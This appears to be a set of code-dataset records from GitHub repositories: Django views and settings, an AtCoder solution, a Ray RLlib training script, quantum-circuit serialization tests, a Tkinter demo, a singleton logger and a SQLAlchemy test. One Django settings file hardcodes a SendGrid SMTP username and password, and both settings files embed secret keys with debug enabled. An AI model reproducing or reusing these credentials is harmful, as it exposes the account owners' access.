from django.shortcuts import render, redirect, get_object_or_404
from .models import Article
from .form import ArticleForm, PostForm
from profiles.tasks import send_email
def index(request):
articles = Article.objects.order_by('id').all()
return render(request, 'news/index.html', {'articles': articles})
@login_required(login_url='/profile/login/')
def create_article(request):
if request.method == 'POST':
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.created_by = request.user
# Set True to cancel moderation if need
if not request.user.extendeduserdata.role.moderation:
article.is_published = True
article.save()
return redirect('news:index')
else:
form = ArticleForm()
return render(request, 'news/new_article.html', {'form': form})
def article_posts(request, article_pk):
article = get_object_or_404(Article, pk=article_pk)
posts = article.posts.order_by('id')
return render(request, 'news/article_posts.html', {'article': article, 'posts': posts})
@login_required(login_url='/profile/login/')
def reply_article(request, article_pk):
article = get_object_or_404(Article, pk=article_pk)
if request.method == 'POST':
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.article = article
post.created_by = request.user
post.save()
# send_email comes from profiles.tasks; if it is a Celery task, calling
# send_email.delay(...) here would dispatch it asynchronously
send_email(article.created_by.email, f"You have a reply in article '{article.title}'")
return redirect('news:article_posts', article_pk=article.pk)
else:
form = PostForm()
return render(request, 'news/reply_article.html', {'form': form, 'article': article})
| [
"[email protected]"
] | |
68f4037aa526aad531757e9a55837c620b165268 | 97e7c5b72154c3fa89c95d7fb4ef4eb295a706ab | /at/ABC/ABC_085_C.py | a980a4f201ebbeb99107255bb50269c18f4e300a | [] | no_license | tamuraryo0126/programing | d679e4c78d970eee45e7524c7a3d7290f7fa6d14 | 55c4b2a7fb349723626419a26ba1fa4065e46695 | refs/heads/master | 2020-03-21T15:00:20.478885 | 2018-11-29T04:37:09 | 2018-11-29T04:37:09 | 138,688,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | N,Y=map(int,input().split())
# Brute force (AtCoder ABC 085 C): try i bills of 10000 yen and j bills of
# 5000 yen; the remaining N-i-j bills are 1000 yen each.
for i in range(N + 1):
    for j in range(N + 1 - i):
        if 10000 * i + 5000 * j + 1000 * (N - i - j) == Y:
            print(i, j, N - i - j)
            quit()
print("-1 -1 -1")
| [
"[email protected]"
] | |
ed7cb93e2ed6141fbeaa78fef4dea002f0fc856e | 202e31dd277cd08b1e65f6e990c232602163a529 | /godot_rl_agents/tests/zeb_test_ray_wrapper.py | 7c31d3f0e03174210342bb0cd0ab13520b4b5034 | [
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference",
"CC-BY-4.0"
] | permissive | cove9988/godot_rl_agents | 757f210d6dcaf0adb2f014386fb0cfa15cbe546a | 98821bdcd68304ec31350701bba064bbdcdb3ba6 | refs/heads/main | 2023-08-21T03:55:45.908510 | 2021-10-17T18:40:04 | 2021-10-17T18:40:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,507 | py | import numpy as np
import ray
from ray import tune
from ray.rllib.utils.annotations import override
from ray.rllib.utils.typing import MultiAgentDict, PolicyID, AgentID
from ray.rllib.agents import impala
from ray.tune.logger import pretty_print
import ray.rllib.agents.ppo as ppo
from godot_rl_agents.core.utils import register_env
if __name__ == "__main__":
ray.init()
register_env()
config = {
"env": "godot",
"env_config": {
"filename": "envs/example_envs/builds/JumperHard/jumper_hard.x86_64",
# "filename": None,
"seed": None,
},
        # For running in editor, force to use just one worker (we only have
        # one Godot instance running)!
"num_workers": 4,
"num_envs_per_worker": 16,
# "remote_worker_envs": True,
# Other settings.
"lr": 0.0003,
"lambda": 0.95,
"gamma": 0.99,
"sgd_minibatch_size": 128,
"train_batch_size": 1024,
"batch_mode": "truncate_episodes",
# Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.
"num_gpus": 0,
"num_sgd_iter": 16,
"rollout_fragment_length": 32,
"clip_param": 0.2,
"entropy_coeff": 0.001,
"model": {
"fcnet_hiddens": [256, 256],
},
"framework": "torch",
"no_done_at_end": True,
"soft_horizon": True,
}
stop = {
"training_iteration": 200,
"timesteps_total": 1000000,
"episode_reward_mean": 400.0,
}
# trainer = ppo.PPOTrainer(config=config, env="godot")
# # Can optionally call trainer.restore(path) to load a checkpoint.
# for i in range(100):
# # Perform one iteration of training the policy with PPO
# result = trainer.train()
# print(pretty_print(result))
# if i % 10 == 0:
# checkpoint = trainer.save()
# print("checkpoint saved at", checkpoint)
# checkpoint = "/home/edward/ray_results/PPO/PPO_godot_658a8_00000_0_2021-08-30_20-23-39/checkpoint_000200/checkpoint-200"
# print(config)
# Run the experiment.
results = tune.run(
"PPO",
config=config,
stop=stop,
verbose=3,
checkpoint_freq=5,
checkpoint_at_end=True,
restore=None,
)
# trainer = ppo.PPOTrainer(config=config, env="godot")
# trainer.load_checkpoint(results.get_last_checkpoint())
# print(trainer.get_policy().get_weights())
ray.shutdown()
| [
"[email protected]"
] | |
6a80f1e4ce6a2892e8d9a978640499904cf163a6 | 5642a27fb8f0ee5e3e29036c84704e62db90a9a6 | /my_project/settings.py | f875f761671fb35fcea152defc1c7cad24e4f6e6 | [] | no_license | mayurfinity/django_basic | bff5b8e5a178d86c7553004ef9be7b8861e6bd93 | e4ca77163fc4cef0de14594bb76acb24ac95bd75 | refs/heads/main | 2023-01-19T07:32:19.775269 | 2020-11-13T14:36:08 | 2020-11-13T14:36:08 | 312,298,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | """
Django settings for my_project project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=i2^)2y!0%kz8f20fti5dpovuk23!g8e$vu_h!!i0!$l!*8i7l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'basic_app',
'django_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'my_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'my_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
AUTH_USER_MODEL = "basic_app.CustUser" | [
"[email protected]"
] | |
165cc550b88080b62182b10cfb502c6484f69c33 | 5d83089c29052ba850a08968676826a02b94b64d | /src/python/zquantum/core/wip/circuits/_serde_test.py | 3969d141ba9c8aeaf331753ea2d1d024b36bdb0b | [
"Apache-2.0"
] | permissive | koderat/z-quantum-core | 35bd27ec3f0597edc65a97dc5b9ed9bd29c2bc81 | 45aefee4eea05bce8d26c201bd471b76d05db139 | refs/heads/master | 2023-04-07T02:13:58.204681 | 2021-03-19T16:26:28 | 2021-03-19T16:26:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,179 | py | import pytest
import sympy
import numpy as np
from . import _gates
from . import _builtin_gates
from . import _circuit
from ._serde import (
serialize_expr,
deserialize_expr,
circuit_from_dict,
custom_gate_def_from_dict,
to_dict,
)
ALPHA = sympy.Symbol("alpha")
GAMMA = sympy.Symbol("gamma")
THETA = sympy.Symbol("theta")
CUSTOM_U_GATE = _gates.CustomGateDefinition(
"U",
sympy.Matrix(
[
[THETA, GAMMA],
[-GAMMA, THETA],
]
),
(THETA, GAMMA),
)
@pytest.mark.parametrize(
"circuit",
[
_circuit.Circuit(),
_circuit.Circuit([_builtin_gates.X(0)]),
_circuit.Circuit([_builtin_gates.X(2), _builtin_gates.Y(1)]),
_circuit.Circuit(
[
_builtin_gates.H(0),
_builtin_gates.CNOT(0, 1),
_builtin_gates.RX(0)(5),
_builtin_gates.RX(np.pi)(2),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(GAMMA * 2)(3),
]
),
_circuit.Circuit(
operations=[
_builtin_gates.T(0),
CUSTOM_U_GATE(1, -1)(3),
CUSTOM_U_GATE(ALPHA, -1)(2),
],
),
_circuit.Circuit(
operations=[
CUSTOM_U_GATE(2 + 3j, -1)(2),
],
),
_circuit.Circuit(
[
_builtin_gates.H.controlled(1)(0, 1),
]
),
_circuit.Circuit(
[
_builtin_gates.Z.controlled(2)(4, 3, 0),
]
),
_circuit.Circuit(
[
_builtin_gates.RY(ALPHA * GAMMA).controlled(1)(3, 2),
]
),
_circuit.Circuit(
[
_builtin_gates.X.dagger(2),
_builtin_gates.I.dagger(4),
_builtin_gates.Y.dagger(1),
_builtin_gates.Z.dagger(2),
_builtin_gates.T.dagger(7),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(-np.pi).dagger(2),
_builtin_gates.RY(-np.pi / 2).dagger(1),
_builtin_gates.RZ(0).dagger(0),
_builtin_gates.PHASE(np.pi / 5).dagger(2),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(GAMMA * ALPHA).dagger(1),
]
),
],
)
class TestCircuitSerialization:
def test_roundrip_results_in_same_circuit(self, circuit):
serialized = to_dict(circuit)
assert circuit_from_dict(serialized) == circuit
def test_deserialized_gates_produce_matrices(self, circuit):
deserialized_circuit = circuit_from_dict(to_dict(circuit))
for operation in deserialized_circuit.operations:
# matrices are computed lazily, so we have to call the getter to know if
# we deserialized parameters properly
operation.gate.matrix
class TestCustomGateDefinitionSerialization:
@pytest.mark.parametrize(
"gate_def",
[
_gates.CustomGateDefinition(
"V", sympy.Matrix([[THETA, GAMMA], [-GAMMA, THETA]]), (THETA, GAMMA)
)
],
)
def test_roundtrip_gives_back_same_def(self, gate_def):
dict_ = to_dict(gate_def)
assert custom_gate_def_from_dict(dict_) == gate_def
class TestExpressionSerialization:
@pytest.mark.parametrize(
"expr,symbol_names",
[
(0, []),
(1, []),
(-1, []),
(THETA, ["theta"]),
(GAMMA, ["gamma"]),
(THETA * GAMMA + 1, ["gamma", "theta"]),
(2 + 3j, []),
((-1 + 2j) * THETA * GAMMA, ["gamma", "theta"]),
],
)
def test_roundtrip_results_in_equivalent_expression(self, expr, symbol_names):
serialized = serialize_expr(expr)
deserialized = deserialize_expr(serialized, symbol_names)
# `deserialized == expr` wouldn't work here for complex literals because of
# how Sympy compares expressions
assert deserialized - expr == 0
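# For reference, the round-trip under test is simply (names as used above):
#   circuit = _circuit.Circuit([_builtin_gates.X(0)])
#   assert circuit_from_dict(to_dict(circuit)) == circuit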
| [
"[email protected]"
] | |
13ad3ac4eec115ca433e8fbc3ddaafc3ae3d0332 | 23bbaf0207772f1fc9b4519a0982fe976425f7b3 | /env/bin/wheel | 45226e48b660fcd363f1f31db9deaf8ae0758d67 | [] | no_license | nakedlunch/kanban | aa4c45ca45d7dc939e6694076f9da124e82de8f7 | a3c82871cad044f7dfa9e5f7a324bf7cdd56f256 | refs/heads/master | 2020-03-27T07:17:43.377266 | 2018-08-26T23:47:12 | 2018-08-26T23:47:12 | 146,178,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | #!/Users/elliot/dev/Kanban/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
3b30bf6edad76b99281f9a1bad5845b2575bed29 | 1dba27f25a5faa46e81638404d9ee4cb793ddf19 | /newspaper_project/newspaper_project/settings.py | b7f3997af12db9836317ab982a5d4783e7eb27b5 | [] | no_license | aybamidele/newspaper-django-app | efbde3f0964a9ecaca3d35897f4a45a95e94dd57 | 99fb63a0c1632c15e38058e8faf55e3fb0b3a00a | refs/heads/master | 2020-03-31T20:38:11.985351 | 2018-10-13T12:47:26 | 2018-10-13T12:47:26 | 152,548,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | """
Django settings for newspaper_project project.
Generated by 'django-admin startproject' using Django 2.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qdv-hgdocu6c7i$1wu$j28c54$luj2=1nh(pum^szypho9e7^3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
'pages',
'crispy_forms',
'articles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newspaper_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newspaper_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'users.CustomUser'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'andrebam'
EMAIL_HOST_PASSWORD = 'Tolulope1'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
| [
"[email protected]"
] | |
5d2eb29592b9ad81a73a8f5da5386f4a23803f30 | ddebed6f9aa34f8506c2ac202ceb6b5a04c6b2a0 | /yiqi/apps/userOperation/migrations/0002_auto_20181031_1703.py | bf4382195bd28cdc78213389e3c5137a68061be0 | [] | no_license | AmirHuang/yiqi | bcd773db02740f83c8f478494500013a36d7d77e | 561325a35ca21e9685c9c1a946d5604d7d3afc74 | refs/heads/master | 2020-04-25T03:56:28.988287 | 2019-02-25T11:34:00 | 2019-02-25T11:34:00 | 172,493,868 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py | # Generated by Django 2.0.2 on 2018-10-31 09:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('activity', '0002_auto_20181031_1703'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('userOperation', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='sysmessages',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='接收用户'),
),
migrations.AddField(
model_name='sharingusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='分享用户'),
),
migrations.AddField(
model_name='reporttionusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='举报活动'),
),
migrations.AddField(
model_name='reporttionusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='举报用户'),
),
migrations.AddField(
model_name='feedbackmodels',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='反馈用户'),
),
migrations.AddField(
model_name='commentsmodels',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='评论活动'),
),
migrations.AddField(
model_name='commentsmodels',
name='parent_comment',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='p_comment', to='userOperation.CommentsModels', verbose_name='父评论'),
),
migrations.AddField(
model_name='commentsmodels',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='评论用户'),
),
migrations.AddField(
model_name='collectionusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='收藏活动'),
),
migrations.AddField(
model_name='collectionusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='收藏用户'),
),
migrations.AddField(
model_name='browseusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='activity_db', to='activity.ActivityModel', verbose_name='浏览活动'),
),
migrations.AddField(
model_name='browseusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='浏览用户'),
),
migrations.AddField(
model_name='activityuserinfo',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='活动'),
),
migrations.AddField(
model_name='activityuserinfo',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='报名用户'),
),
]
| [
"[email protected]"
] | |
4ae12faf6838569609ce4b6c06aa800853d3ac79 | d8d88c5bbe09c0f4fae8987fee0608e2cc96094c | /gui/hello_world.py | 674e092543503a8a301ff3476ff654c29e769377 | [] | no_license | liushuiluohua/learn-python | 03e7b6429162fcac20e1ac66508cfbfcdd766c72 | 7d864c6713c9aebfc8b2574d0f8fbdedf962b51f | refs/heads/master | 2020-12-26T03:43:23.761160 | 2017-11-09T03:15:44 | 2017-11-09T03:15:44 | 25,071,038 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-

'a hello world GUI example.'

from Tkinter import *


class Application(Frame):
    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.pack()
        self.createWidgets()

    def createWidgets(self):
        self.helloLabel = Label(self, text='Hello, world!')
        self.helloLabel.pack()
        self.quitButton = Button(self, text='Quit', command=self.quit)
        self.quitButton.pack()


app = Application()
# window title:
app.master.title('Hello World')
# main event loop:
app.mainloop()
| [
"[email protected]"
] | |
98e4fe446852205a84cd13c25111e4153ef15194 | 460a24c7d34bc3b9632afb8b75922fd4932a9170 | /singleton/logger.py | fb60cd7d21d089655a80acd2903c02d00bfd32c9 | [] | no_license | jokerTing/python-design-patterns | 1476833e745a2a87487bc48b53187e655f70c4ee | 3e62d60a99578b88ea78c42a2d89e0c5ecbc32b9 | refs/heads/master | 2022-01-21T01:01:59.266522 | 2022-01-18T02:11:43 | 2022-01-18T02:11:43 | 182,976,986 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | from singleton_object import SingletonObject
#record the log
#__author__='ShadowDing'
class Logger(object):
"""
A file-based message logger with the following properties
Attributes:
file_name: a string representing the full path of the log file to which
this logger will write its messgae
"""
class __Logger():
def __init__(self, file_name):
""" Return a Logger object whose file_name is *file_name* """
self.file_name = file_name
def __str__(self):
return "{0!r} {1}".format(self, self.file_name)
# record msg in the Target file
def _write_log(self, level, msg):
with open(self.file_name, "a") as log_file:
log_file.write("[{0}] {1} \n".format(level, msg))
# record the CRITICAL msg
def critical(self, msg):
self._write_log("CRITICAL", msg)
# record the ERROR msg
def error(self, msg):
self._write_log("ERROR", msg)
# record the WARN msg
def warn(self, msg):
self._write_log("WARN", msg)
# record the INFO msg
def info(self, msg):
self._write_log("INFO", msg)
# record the DEBUG msg
def debug(self, msg):
self._write_log("DEBUG", msg)
    instance = None

    def __new__(cls, *args, **kwargs):
        print("new")
        if not Logger.instance:
            print("first create")
            Logger.instance = Logger.__Logger(*args, **kwargs)
        return Logger.instance

    def __getattr__(self, name):
        # only called when normal lookup fails; delegate to the shared instance
        print("__getattr__() is called ")
        return getattr(self.instance, name)

    def __setattr__(self, name, val):
        print("change")
        return setattr(self.instance, name, val)
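if __name__ == '__main__':
    # Minimal sketch of the singleton behaviour; the log file paths are
    # illustrative assumptions.
    log1 = Logger('/tmp/app.log')
    log2 = Logger('/tmp/other.log')  # reuses the first instance, file_name unchanged
    print(log1 is log2)              # True
    log1.info('hello')               # appends "[INFO] hello" to /tmp/app.log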
| [
"[email protected]"
] | |
86fe21da6e53357da6f41a5b7d95dd034c2d3284 | a9bdddbe65c0f4a9ade6fecf6d88440b43d681d4 | /backend/src/geektrade/settings.py | be2279982e4c0c1f3fc3eb966ccc776021af986b | [] | no_license | winiciuscota/GeekTrade | e2d7c1e6a72af5dff59216a721e41355fc47df83 | 39a6b7b8b1baab8e1c373d8efdf39698c9cda34f | refs/heads/master | 2020-04-22T07:17:12.338210 | 2019-02-12T01:47:48 | 2019-02-12T01:47:48 | 170,214,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,769 | py | import time
"""
Django settings for geektrade project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import environ
# Load operating system env variables and prepare to use them
env = environ.Env()
# local.env file, should load only in development environment
env_file = os.path.join(os.path.dirname(__file__), 'local.env')
if os.path.exists(env_file):
environ.Env.read_env(str(env_file))
QUOTATION_API_KEY = env('QUOTATION_API_KEY')
QUOTATION_API_URL = env('QUOTATION_API_URL')
QUOTATION_REQUEST_URL = QUOTATION_API_URL + QUOTATION_API_KEY
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'aze!9t4+&(&28$x45+tm3)g%gdk2ko@6vrz@ih8p6x*6pn2#)!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# CORS settings
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'quotations.apps.QuotationsConfig',
'corsheaders',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'geektrade.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'geektrade.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
f134de3fa0bc09d9841e4fd5d7a76fd6c8d79dbe | ecc3806d0a417bfcc6d37f9bb5107bf9fa72275f | /lyweb/lib/SQLAlchemy-0.8.2/test/orm/inheritance/test_selects.py | dd9c8c8b81ad7af74bf54cb0a9af09dba5a796e2 | [
"MIT"
] | permissive | luoyun/LuoYunCloud | ef6fa76e8b3a0880392b71d7569b304009041bf1 | ee8fedd988cc39375dda69588c2f7bba1223fbe1 | refs/heads/master | 2021-12-03T05:26:47.656130 | 2021-11-30T13:16:34 | 2021-11-30T13:16:34 | 3,886,020 | 6 | 10 | null | 2013-06-25T14:04:23 | 2012-03-31T14:33:55 | JavaScript | UTF-8 | Python | false | false | 1,820 | py | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy import testing
from sqlalchemy.testing import fixtures
class InheritingSelectablesTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global foo, bar, baz
foo = Table('foo', metadata,
Column('a', String(30), primary_key=1),
Column('b', String(30), nullable=0))
bar = foo.select(foo.c.b == 'bar').alias('bar')
baz = foo.select(foo.c.b == 'baz').alias('baz')
def test_load(self):
# TODO: add persistence test also
testing.db.execute(foo.insert(), a='not bar', b='baz')
testing.db.execute(foo.insert(), a='also not bar', b='baz')
testing.db.execute(foo.insert(), a='i am bar', b='bar')
testing.db.execute(foo.insert(), a='also bar', b='bar')
class Foo(fixtures.ComparableEntity): pass
class Bar(Foo): pass
class Baz(Foo): pass
mapper(Foo, foo, polymorphic_on=foo.c.b)
mapper(Baz, baz,
with_polymorphic=('*', foo.join(baz, foo.c.b=='baz').alias('baz')),
inherits=Foo,
inherit_condition=(foo.c.a==baz.c.a),
inherit_foreign_keys=[baz.c.a],
polymorphic_identity='baz')
mapper(Bar, bar,
with_polymorphic=('*', foo.join(bar, foo.c.b=='bar').alias('bar')),
inherits=Foo,
inherit_condition=(foo.c.a==bar.c.a),
inherit_foreign_keys=[bar.c.a],
polymorphic_identity='bar')
s = sessionmaker(bind=testing.db)()
assert [Baz(), Baz(), Bar(), Bar()] == s.query(Foo).order_by(Foo.b.desc()).all()
assert [Bar(), Bar()] == s.query(Bar).all()
| [
"[email protected]"
] | |
